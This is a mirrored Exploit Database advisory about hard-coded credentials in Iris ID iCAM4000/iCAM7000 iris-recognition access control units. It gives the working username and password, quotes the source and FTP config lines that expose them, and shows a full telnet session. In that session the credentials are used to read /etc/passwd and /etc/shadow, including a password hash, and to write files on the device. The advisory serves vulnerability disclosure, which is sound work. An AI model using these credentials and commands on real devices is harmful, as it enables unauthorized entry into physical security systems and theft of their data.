Iris ID IrisAccess iCAM4000/iCAM7000 – Hard-Coded Credentials Remote Shell Access

• Exploit Database
• 16 阅读

• 作者： LiquidWorm
  日期： 2016-07-26
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/40167/

• 
  Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access
  
  
  Vendor: Iris ID, Inc.
  Product web page: http://www.irisid.com
  irisaccess4000
  
  http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/
  IrisAccess 7000S
  
  iCAM7S series
  
  
  Affected version: iCAM4000:
  iCAM Software: 3.09.02
  iCAM File system: 1.3
  CMR Firmware: 5.5 and 3.8
  EIF Firmware: 9.5 and 8.0
  HID iClass Library: 2.01.05
  ImageData Library: 1.153
  Command Process: 1.02
  
  iCAM7000:
  iCAM Software: 8.01.07
  iCAM File system: 1.4.0
  EIF Firmware: 1.9
  HID iClass Library: 1.00.00
  ImageData Library: 01.01.32
  EyeSeek Library: 5.00
  Countermeasure Library: 3.00
  LensFinder Library: 5.00
  Tilt Assist Library: 4.00
  
  Summary: The 4th generation IrisAccess™ 7000 series iris recognition solution offered
  by Iris ID provides fast, secure, and highly accurate, non-contact identification
  by the iris of the eye. The iCAM7000's versatility and flexibility allows for easy
  integration with many Wiegand and network based access control, time and attendance,
  visitor management and point of sale applications.
  
  The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess
  4000 range. Simultaneous two-eye capture, face-badging camera, motorized height adjust,
  iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional
  wall-mount is used.
  
  Desc: The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials.
  When visiting the device interface with a browser on port 80, the application loads an applet
  JAR file 'ICAMClient.jar' into user's browser which serves additional admin features. In the
  JAR file there is an account 'rou' with password 'iris4000' that has read and limited write
  privileges on the affected node. An attacker can access the device using these credentials
  starting a simple telnet session on port 23 gaining access to sensitive information and/or
  FTP access on port 21 (with EVERYTHING allowed) and uploading malicious content.
  
  =====================================================================================
  
  /html/ICAMClient.jar (ICAMClient.java):
  ---------------------------------------
  
  97:param_host = getParameter("host");
  98:param_user = "rou";//getParameter("user");
  99:param_pass = "iris4000";//getParameter("pass"); // password
  100: param_path = getParameter("path"); // path on the server
  
  
  /etc/ftpd/ftpd.conf:
  --------------------
  
  69:# User list:
  70:# Format:user=<login> <passwd> <subdir> <maxlogins> <flags>
  71:# <login> user name
  72:# <passwd>password or * for anonymous access
  73:# <subdir>(internally appended to serverroot)
  74:# the user has access to the WHOLE SUBTREE,
  75:# if the server has access to it
  76:# <maxlogins> maximal logins with this usertype
  77:# <flags> D - download
  78:# U - upload + making directories
  79:# O - overwrite existing files
  80:# M - allows multiple logins
  81:# E - allows erase operations
  82:# A - allows EVERYTHING(!)
  101: 
  103: user=rou iris4000 / 5 A
  
  =====================================================================================
  
  
  Tested on: GNU/Linux 2.4.19 (armv5tel)
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2016-5347
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php
  
  
  06.05.2016
  
  --
  
  
  telnet [IP]
  iCAM4000 login: rou
  Password:
  [rou@iCAM4000 rou]# id
  uid=500(rou) gid=500(rou) groups=500(rou)
  [rou@iCAM4000 rou]# cat /etc/passwd
  root:x:0:0:root:/root:/bin/bash
  bin:x:1:1:bin:/bin:
  daemon:x:2:2:daemon:/sbin:
  adm:x:3:4:adm:/var/adm:
  lp:x:4:7:lp:/var/spool/lpd:
  sync:x:5:0:sync:/sbin:/bin/sync
  shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  halt:x:7:0:halt:/sbin:/sbin/halt
  mail:x:8:12:mail:/var/spool/mail:
  news:x:9:13:news:/var/spool/news:
  uucp:x:10:14:uucp:/var/spool/uucp:
  operator:x:11:0:operator:/root:
  games:x:12:100:games:/usr/games:
  gopher:x:13:30:gopher:/usr/lib/gopher-data:
  ftp:x:14:50:FTP User:/home/ftp:
  nobody:x:99:99:Nobody:/:
  rou:x:500:500::/home/rou:/bin/bash
  [rou@iCAM4000 rou]# cd /web
  [rou@iCAM4000 /web]# ls -al
  total 0
  drwxrwxr-x1 rourou 0 Jul 26 07:22 .
  drwxr-xr-x1 root root0 Jan11970 ..
  drwxrwxr-x1 rourou 0 Jan 312013 cgi-bin
  drwxrwxr-x1 rourou 0 Jan 312013 html
  drwxrwxr-x1 rourou 0 Jan 312013 images
  [rou@iCAM4000 /web]# cat /etc/shadow
  root:{{REMOVED}}
  bin:*:10897:0:99999:7:::
  daemon:*:10897:0:99999:7:::
  adm:*:10897:0:99999:7:::
  lp:*:10897:0:99999:7:::
  sync:*:10897:0:99999:7:::
  shutdown:*:10897:0:99999:7:::
  halt:*:10897:0:99999:7:::
  mail:*:10897:0:99999:7:::
  news:*:10897:0:99999:7:::
  uucp:*:10897:0:99999:7:::
  operator:*:10897:0:99999:7:::
  games:*:10897:0:99999:7:::
  gopher:*:10897:0:99999:7:::
  ftp:*:10897:0:99999:7:::
  nobody:*:10897:0:99999:7:::
  rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7:::
  [rou@iCAM4000 /web]# cat /etc/issue
  
  Iris@ID iCAM4000 Linux (experimental)
  Kernel 2.4.19-rmk7-pxa1 on an armv5tel
  [rou@iCAM4000 /web]# ls -al html/
  total 289
  drwxrwxr-x1 rourou 0 Jan 312013 .
  drwxrwxr-x1 rourou 0 Jul 26 07:22 ..
  -rw-rw-r--1 rourou4035 Jan 312013 DHCPSettings_reboot.htm
  -rw-rw-r--1 rourou100614 Jan 102008 ICAMClient.jar
  -rw-rw-r--1 rourou6376 Jan 312013 WiegandSettings.htm
  -rw-rw-r--1 rourou5643 Jan 312013 authentication.htm
  -rw-rw-r--1 rourou6166 Jan 312013 changeusername.htm
  -rw-rw-r--1 rourou4816 Jan 312013 displayconfigsettings.htm
  -rw-rw-r--1 rourou5643 Jan 312013 downloadauthentication.htm
  -rw-rw-r--1 rourou4850 Jan 312013 downloadvoice_result.htm
  -rw-rw-r--1 rourou3237 Jan 312013 error.htm
  -rw-rw-r--1 rourou3234 Jan 312013 error_ip.htm
  -rw-rw-r--1 rourou3248 Jan 312013 error_loginfailure.htm
  -rw-rw-r--1 rourou3349 Jan 312013 error_usb_ip.htm
  -rw-rw-r--1 rourou6128 Jan 312013 ftpupload.htm
  -rw-rw-r--1 rourou5331 Jan 312013 iCAMConfig.htm
  -rw-rw-r--1 rourou4890 Jan 312013 icamconfig_reboot.htm
  -rw-rw-r--1 rourou5314 Jan 312013 index.htm
  -rw-rw-r--1 rourou7290 Jan 312013 main.htm
  -rw-rw-r--1 rourou3662 Jan 312013 reboot_result.htm
  -rw-rw-r--1 rourou5782 Jan 312013 smartcardauthentication.htm
  -rw-rw-r--1 rourou 17783 Jan 312013 smartcardconfig.htm
  -rw-rw-r--1 rourou4895 Jan 312013 smartcardconfig_reboot.htm
  -rw-rw-r--1 rourou5809 Jan 312013 smartcardconfig_result.htm
  -rw-rw-r--1 rourou3672 Jan 312013 systeminfo.htm
  -rw-rw-r--1 rourou5870 Jan 312013 updateicamconfig.htm
  -rw-rw-r--1 rourou4239 Jan 312013 updateicamconfig_result.htm
  -rw-rw-r--1 rourou6612 Jan 312013 updatenetworksettings.htm
  -rw-rw-r--1 rourou4651 Jan 312013 updatenetworksettings_result.htm
  -rw-rw-r--1 rourou5014 Jan 312013 updatenetworksettings_state.htm
  -rw-rw-r--1 rourou3985 Jan 312013 upload.htm
  -rw-rw-r--1 rourou5645 Jan 312013 uploadauthentication.htm
  -rw-rw-r--1 rourou4737 Jan 312013 uploadiriscapture_result.htm
  -rw-rw-r--1 rourou6028 Jan 312013 voicemessagedownload.htm
  -rw-rw-r--1 rourou6299 Jan 312013 voicemessageupdate.htm
  -rw-rw-r--1 rourou5645 Jan 312013 wiegandauthentication.htm
  -rw-rw-r--1 rourou4893 Jan 312013 wiegandconfig_reboot.htm
  [rou@iCAM4000 /web]# echo $SHELL
  /bin/bash
  [rou@iCAM4000 /web]# echo pwn > test.write
  [rou@iCAM4000 /web]# cat test.write
  pwn
  [rou@iCAM4000 /web]# rm -rf test.write
  [rou@iCAM4000 /web]# cd /etc/ftpd
  [rou@iCAM4000 ftpd]# pwd
  /etc/ftpd
  [rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou
  user=rou iris4000 / 5 A
  [rou@iCAM4000 ftpd]# ^D
  Connection to host lost.